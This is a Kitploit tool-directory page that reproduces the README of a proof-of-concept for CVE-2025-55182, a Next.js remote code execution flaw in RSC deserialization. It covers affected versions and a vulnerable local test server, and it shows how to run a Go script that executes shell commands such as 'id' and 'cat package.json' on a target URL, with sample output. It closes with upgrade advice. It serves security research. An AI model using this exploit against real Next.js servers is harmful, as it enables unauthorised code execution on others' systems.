Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-55182 — Proof-of-concept exploit for CVE-2025-55182, a Next.js RCE vulnerability via insecure deserialization in RSC requests. Includes a Go-based POC script and a vulnerable test server for security research and education. | Kitploit
Tools/GitHubGitHub/hoosin/cve-2025-55182
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubhoosin/cve-2025-55182

CVE-2025-55182

Proof-of-concept exploit for CVE-2025-55182, a Next.js RCE vulnerability via insecure deserialization in RSC requests. Includes a Go-based POC script and a vulnerable test server for security research and education.

View Repository
389 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-55182 Next.js RCE Reproduction Guide

Disclaimer

⚠️ This tool is for security research and educational purposes only. Do not use it for illegal activities. ⚠️

Vulnerability Overview

CVE-2025-55182 is a critical remote code execution (RCE) vulnerability in the Next.js framework. This vulnerability originates from an unsafe deserialization issue when Next.js processes React Server Components (RSC) requests. Attackers can execute arbitrary code on the server without authorization by crafting malicious HTTP requests.

Affected Versions:

  • Next.js 15.x < 15.0.5
  • Next.js 16.x < 16.0.7
  • As well as some Canary versions

Environment Setup

This project provides a vulnerable Next.js test server test-server.

1. Start the Test Server

Ensure you have Node.js and npm installed.

cd test-server
npm install
npm run dev

The server runs by default at http://localhost:3000.

Note: If you encounter lock file errors, try running:

rm -f .next/dev/lock && npm run dev

Vulnerability Reproduction (POC)

This project provides a Go language POC script poc.go.

Using the Go Script

Usage:

go run poc.go [target URL] [command to execute]

Examples:

  1. Execute the id command (default)

    go run poc.go
    

    Or

    go run poc.go http://localhost:3000 id
    
  2. List files in the current directory

    go run poc.go http://localhost:3000 "ls -la"
    
  3. View file contents

    go run poc.go http://localhost:3000 "cat package.json"
    

Expected Output: Although the HTTP status code returns 500, the command execution result will be included in the digest field of the response.

1:E{"digest":"uid=502(hoosin) gid=20(staff) ...","name":"Error","message":"NEXT_REDIRECT",...}

Remediation

Upgrade Next.js to a safe version:

  • Next.js 15.x -> 15.0.5+
  • Next.js 16.x -> 16.0.7+
npm install next@latest react@latest react-dom@latest
Download Tool